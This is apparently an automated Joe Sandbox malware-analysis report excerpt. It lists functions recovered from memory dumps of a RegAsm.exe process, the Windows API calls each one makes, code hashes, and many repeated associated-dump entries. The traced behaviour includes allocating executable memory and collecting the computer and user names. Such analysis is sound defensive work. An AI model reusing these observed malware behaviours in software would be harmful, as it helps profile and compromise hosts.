Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 7196fd1d7fdf7034ddb2e375c3baa252de905fd29263ed2394349883f6641c50
Instruction ID: e0be25968149aafb42a348446a4bf8d1b8c1be94a7ef2c7b8365e7541d0fe6a1
Opcode Fuzzy Hash: 7196fd1d7fdf7034ddb2e375c3baa252de905fd29263ed2394349883f6641c50
Instruction Fuzzy Hash: D9916571911108ABDB04FBE1DD52EEE7339AF14314F40452EF507A6091EF386A99CBBA

Function 0040B230 Relevance: 2.7, APIs: 2, Instructions: 205stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

lstrlenA.KERNEL32(00000000), ref: 0040B42E
lstrlenA.KERNEL32(00000000), ref: 0040B442

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$lstrcat
String ID:
API String ID: 2500673778-0
Opcode ID: 1bb70f0f7b802db361104b8de629577cdd17b6d15550e8d3a417d2542ba31408
Instruction ID: fa4c7b04dc1bb1edeb240a941fc638acc8c20e4742db631e424c44125528f59d
Opcode Fuzzy Hash: 1bb70f0f7b802db361104b8de629577cdd17b6d15550e8d3a417d2542ba31408
Instruction Fuzzy Hash: 68716271911108ABDB04FBA1DD92DEE7339BF14314F40452EF506A7091EF386A99CBAA

Function 00406660 Relevance: 2.6, APIs: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00406DBE,00406DBE,00003000,00000040), ref: 00406706
VirtualAlloc.KERNEL32(00000000,00406DBE,00003000,00000040), ref: 00406753

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: c88b1e9b2e88f96002d04ff86a4b027c1f96a501876601beaf0c86e361432a0f
Instruction ID: cfb135ee3c51d7510548447878d0c09a9e1e3ef004be55e97ea32f204b2e5fca
Opcode Fuzzy Hash: c88b1e9b2e88f96002d04ff86a4b027c1f96a501876601beaf0c86e361432a0f
Instruction Fuzzy Hash: B741EE74A00209EFCB44CF58C494BADBBB1FF44314F1486A9E95AAB385C735EA91CF84

Function 004010A0 Relevance: 2.5, APIs: 2, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416A1C), ref: 004010B3
VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416A1C), ref: 004010F7

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction ID: e05e9ea69c75ff17789b13d2c0695db9e8f3777892ad192db41722de5b6306ee
Opcode Fuzzy Hash: 8ce35272a596f1cdf5aa55b7e6bb44489e409ba54c945097ad2cb9ba566d6231
Instruction Fuzzy Hash: F2F052B1681208BBE7109BA4AC49FABB3E8E305B14F301408F500E3380C5319E00CAA4

Function 00418D90 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c36cdc7e8858c8a68b3969eb20504a02303c837a2aa8bea8de9441652dc409ce
Instruction ID: c33170cd47b5ddaf33f3bd529e3e9bd0b8526aec605854159e3974d419e7fdd8
Opcode Fuzzy Hash: c36cdc7e8858c8a68b3969eb20504a02303c837a2aa8bea8de9441652dc409ce
Instruction Fuzzy Hash: C0F01574C00208EBCB00EFA4E5496DDBB74EB11324F10819EE826673C0DB796A96DB89

Function 00418DE0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 1937b3016abb1116ad25b1de693048e6b8ebbf2c452a4d5410bd6c9fe56c08f2
Instruction ID: e82dd92a107a558878b8aedbded484b2d7625ea591a662ceffa58b28bb8b597d
Opcode Fuzzy Hash: 1937b3016abb1116ad25b1de693048e6b8ebbf2c452a4d5410bd6c9fe56c08f2
Instruction Fuzzy Hash: EEE01A75A4034C7BDB91EB90CC96FEE737CDB44B11F004299BA0C5A1C0DE74AB858B91

Function 00401190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 004178E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416A2B), ref: 00417910
Part of subcall function 004178E0: HeapAlloc.KERNEL32(00000000,?,?,?,00416A2B), ref: 00417917
Part of subcall function 004178E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0041792F

Part of subcall function 00417850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417880
Part of subcall function 00417850: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417887
Part of subcall function 00417850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0041789F

ExitProcess.KERNEL32 ref: 004011C6

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
Instruction ID: 3272f285758621328f1ae990cc0b7bdad84480bea6fe4891c0ce75a2ed71569b
Opcode Fuzzy Hash: beae5ea4bba28d8bcdb6621297b085ccf5731606b7c52db2eb8bbe7634c0c08e
Instruction Fuzzy Hash: 72E0C2B999030123DB0433F2AD0AB6B329D5B0538DF04042EFA08D2252FE2CE84085AE

Function 00418E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 5813d97e5a9d5e62cf6b98a9fa413c072790b27809b986ad4fea9f9272a325ca
Instruction ID: 4e8330aeffd582690bdeed6f2b2e87d9bfe7c5a3600f95b8df6029cd87e1cd21
Opcode Fuzzy Hash: 5813d97e5a9d5e62cf6b98a9fa413c072790b27809b986ad4fea9f9272a325ca
Instruction Fuzzy Hash: 0E01FB3494420CEFCB04CF98C5857EC7BB1EF05308F288089D905AB350C7795E84DB89

Function 00409880 Relevance: 1.3, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT(00000020,00410759,?,?), ref: 00409888

Memory Dump Source

Source File: 00000004.00000002.2534365858.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2534365858.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000485000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000488000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004B1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004BD000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004E2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000004EF000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000050F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000051E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005A5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005C5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.00000000005CB000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000064A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2534365858.000000000065C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 7f10dcdaec539b6f97e29b857dd5b55aac166e971b50c8972073f50d3de9e67a
Instruction ID: cd962e32a7d49cb5ce85c4f0a2f24118ebc1676ac18b43bdebb71eb25e5ca396
Opcode Fuzzy Hash: 7f10dcdaec539b6f97e29b857dd5b55aac166e971b50c8972073f50d3de9e67a
Instruction Fuzzy Hash: C8F054B5D10208FBDB00EFA4D846B9EBBB4EB08300F1084A9E905A7381E6749B14CB95

Non-executed Functions

Function 6C2B6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C2B6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C2B6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6C2B6D26

Part of subcall function 6C2BCA10: malloc.MOZGLUE(?), ref: 6C2BCA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C2B6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C2B6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C2B6D73
free.MOZGLUE(00000000), ref: 6C2B6D80
CertGetNameStringW.CRYPT32 ref: 6C2B6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6C2B6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C2B6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C2B6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6C2B6E10
CryptMsgClose.CRYPT32(00000000), ref: 6C2B6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6C2B6E34
CreateFileW.KERNEL32 ref: 6C2B6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6C2B6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C2B6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C2B709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C2B7103
free.MOZGLUE(00000000), ref: 6C2B7153
CloseHandle.KERNEL32(?), ref: 6C2B7176
__Init_thread_footer.LIBCMT ref: 6C2B7209
__Init_thread_footer.LIBCMT ref: 6C2B723A
__Init_thread_footer.LIBCMT ref: 6C2B726B
__Init_thread_footer.LIBCMT ref: 6C2B729C
__Init_thread_footer.LIBCMT ref: 6C2B72DC
__Init_thread_footer.LIBCMT ref: 6C2B730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6C2B73C2
VerSetConditionMask.NTDLL ref: 6C2B73F3
VerSetConditionMask.NTDLL ref: 6C2B73FF
VerSetConditionMask.NTDLL ref: 6C2B7406
VerSetConditionMask.NTDLL ref: 6C2B740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C2B741A
moz_xmalloc.MOZGLUE(?), ref: 6C2B755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C2B7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C2B7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C2B7598
free.MOZGLUE(00000000), ref: 6C2B75AC

Part of subcall function 6C2DAB89: EnterCriticalSection.KERNEL32(6C32E370,?,?,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284), ref: 6C2DAB94
Part of subcall function 6C2DAB89: LeaveCriticalSection.KERNEL32(6C32E370,?,6C2A34DE,6C32F6CC,?,?,?,?,?,?,?,6C2A3284,?,?,6C2C56F6), ref: 6C2DABD1

Strings

SHA256, xrefs: 6C2B6EC0
CryptCATAdminReleaseCatalogContext, xrefs: 6C2B72C8
(, xrefs: 6C2B768A
wintrust.dll, xrefs: 6C2B72CD

Memory Dump Source

Source File: 00000004.00000002.2566749981.000000006C2A1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C2A0000, based on PE: true

Associated: 00000004.00000002.2566726505.000000006C2A0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567199832.000000006C31D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567304993.000000006C32E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.2567337956.000000006C332000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2a0000_RegAsm.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 03fee1f8f99065405532b756f30e6c62688974afcd7eea3901a6784b450394b2
Instruction ID: 6070b18fdeb00657d6885baa37f9694204667229189369cedc534e45f758d783
